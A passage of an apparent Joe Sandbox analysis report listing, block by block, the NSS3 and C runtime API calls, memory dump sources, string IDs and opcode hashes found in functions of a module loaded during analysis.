                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF7D086
                                                                                                                                                                                                                                                                                                                      • PR_Malloc.NSS3(00000001), ref: 6CF7D0B9
                                                                                                                                                                                                                                                                                                                      • PR_Free.NSS3(?), ref: 6CF7D138
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: FreeMallocstrlen
                                                                                                                                                                                                                                                                                                                      • String ID: >
                                                                                                                                                                                                                                                                                                                      • API String ID: 1782319670-325317158
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                                                                                                                                                      • Instruction ID: a154375ee827fe79d78af9d5499aad24477874fee6d593dd1badb5f6720a66f0
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BED16B63B455460BFB344A7CACA13EA77938782374F98032BD5619BBE5E659C843C331
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8e5dff15ba34a4add3f43ca6b18bb82249523dadff2dae0a69752607a017a2b7
                                                                                                                                                                                                                                                                                                                      • Instruction ID: c14f65c4818623eddfe65b74b39969fcd19f8b17b175a8d9b9ac7beecf24b8ed
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e5dff15ba34a4add3f43ca6b18bb82249523dadff2dae0a69752607a017a2b7
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40F10EB5F192168FEB44CF28C8803AA77F0BB8A308F15826DC805D7B44E734AA55CBC5
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6CDE5001,?,00000003,00000000), ref: 6CF0DFD7
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?,?,?,00000003,?,6CDE5001,?), ref: 6CF0E2B7
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000028,00000003,?,?,?,?,?,?,00000003,?,6CDE5001,?), ref: 6CF0E2DA
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: memcpymemsetstrlen
                                                                                                                                                                                                                                                                                                                      • String ID: W
                                                                                                                                                                                                                                                                                                                      • API String ID: 160209724-655174618
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 17245ba6e69d9feb9596ee8ef7b2ce0c634f1f59c4d4f75fa98f00990771fe9a
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 46cc7142d6484f63c9d6e9ebe42885c1563c8b1755a97dcbd524a05b506481ac
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17245ba6e69d9feb9596ee8ef7b2ce0c634f1f59c4d4f75fa98f00990771fe9a
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DAC10832F052558BDB04CF2584A07AB7BB2BF86B08F29416DDCE99BB42D7319905DBD0
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6CED1052
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6CED1086
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                                                                                                      • String ID: h(l$h(l
                                                                                                                                                                                                                                                                                                                      • API String ID: 1297977491-3413317348
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5017e4f3debe345afc59e106b05f8ce79049d88fdd70794ff975c7a31dd0dd73
                                                                                                                                                                                                                                                                                                                      • Instruction ID: b770192f4dcf9253699d259b788c87dcc2be99feb3e06fab3ef5b0a22ad95c8b
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5017e4f3debe345afc59e106b05f8ce79049d88fdd70794ff975c7a31dd0dd73
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0EA13271F0125A9FDF08CF99C890AEEBBB6BF49314B294129E915A7700D735ED12CB90
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                      • String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
                                                                                                                                                                                                                                                                                                                      • API String ID: 0-3485574213
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 837c0f826cbc3ace94b48e12484670084a1b251931b55e0c0de636076a0edee0
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 623328a10ccfe19c99bada8f8dd021910c63548efc6d90874db38135465c8178
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 837c0f826cbc3ace94b48e12484670084a1b251931b55e0c0de636076a0edee0
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87713762E041115BEB148B6DC8803DEB3A2BF85314F2B4279CD79ABBE1D6719C4B87D1
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                      • String ID: sqlite_$sqlite_master$sqlite_temp_master
                                                                                                                                                                                                                                                                                                                      • API String ID: 0-4221611869
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 90312548c6201d176b636733b15a54f9c90085420dd13b41c2d4835ac14ac9da
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 800743f6e7db87cb80ecfd2ff85b683e604471894531061c989b3c354ba2fc7d
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90312548c6201d176b636733b15a54f9c90085420dd13b41c2d4835ac14ac9da
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7223721B4D1964FD7448F2580606B67BF2EF4731CB7C45AAD9E1AFF42C225E862C790
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                      • String ID: `
                                                                                                                                                                                                                                                                                                                      • API String ID: 0-2679148245
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3d7ff38ad1e80951c0b8eadef0e994b0db17bf0957158ef438fbe11b9edea99f
                                                                                                                                                                                                                                                                                                                      • Instruction ID: ed0472359da1276b622ea74bdf9ca5f76294c2c3f2a7c47762a4411665c9eae6
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d7ff38ad1e80951c0b8eadef0e994b0db17bf0957158ef438fbe11b9edea99f
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03928175A04209CFDB05DF99C890BAEBBB2FF88308F249168D415A7B92D735EC59CB50
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                      • String ID: .
                                                                                                                                                                                                                                                                                                                      • API String ID: 0-248832578
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 937c0b5895cfdcb752ac0983de4eb6bb7f813760bfd93f2628def1d10b03106b
                                                                                                                                                                                                                                                                                                                      • Instruction ID: abe71acdeb9c39a1740f79558c9866779de830540297347bdf863b33423b9dad
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 937c0b5895cfdcb752ac0983de4eb6bb7f813760bfd93f2628def1d10b03106b
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6929175A00219CFDB24CF69C480B99B7B2FF49314F2582AED849AB752D738D986CF50
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: htonl
                                                                                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                                                                                      • API String ID: 2009864989-4108050209
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 0a448f9e5b9818ab162be891dbb362aa74e99ba30dda7b6e99f81c2137c17fc7
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 1b7e9e8fe1114ba83ffe45ed7daa1ada5e0c2c5330025e867501cc00a9e082f8
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a448f9e5b9818ab162be891dbb362aa74e99ba30dda7b6e99f81c2137c17fc7
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3516971E481B9CADB16877C88603FFFBB19B8AB14F19432AC9A167AF0C234854587D0
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(0000001C,00000000,00000000,00000000), ref: 6CECFAAA
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE002,00000000,?,?,00000000), ref: 6CECFB3A
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Errormemcpy
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 4073637842-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9acb0c20ddcd21c9605796c29b9027dd6052e344461594769f8bb3a14ddc9e24
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 8a357559532d783a79c1ff63c9e64112d34e0d6b22a8a7a656c2404c3d5975ca
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9acb0c20ddcd21c9605796c29b9027dd6052e344461594769f8bb3a14ddc9e24
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4816271B0021A9FDF04CF59C990AAEBBB6BF98318F254119EC24A7704DB35ED45CBA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE8F019
                                                                                                                                                                                                                                                                                                                      • PK11_GenerateRandom.NSS3(?,00000000), ref: 6CE8F0F9
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: ErrorGenerateK11_Random
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3009229198-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
                                                                                                                                                                                                                                                                                                                      • Instruction ID: f4887785fbd82a088a7cec09c7a0d5980490389be812338c7070291fb22ba143
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A91CF71A0161A8FCB14CF68C8916AEB7F1FF85324F24472DD966A7BC0D734A905CB61
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6CED7929), ref: 6CEB2FAC
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6CED7929), ref: 6CEB2FE0
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Error
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2619118453-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: d893b3b2e8080cd29f9b4b8d35dfdf5fbdd7e366a08193f7735a6093de397f94
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 00825a375ac0c73e9b4afe833c3211c3587c01a97bdcd6739804e109f969b81e
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d893b3b2e8080cd29f9b4b8d35dfdf5fbdd7e366a08193f7735a6093de397f94
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3951E271B049128FD7108E59CA82B7AB3B1FF4631CF394129D909BBB12DB35E946CB81
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                      • String ID: winUnlock$winUnlockReadLock
                                                                                                                                                                                                                                                                                                                      • API String ID: 0-3432436631
                                                                                                                                                                                                                                                                                                                      • Opcode ID: a5dd8c34108c615ff1ff538074e3556280e997adeaa525c0163f62e646eb98be
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 227297934f5adb7cc16d1b8d12e6cb0fe60688cc50614df3a267fb55127ad1de
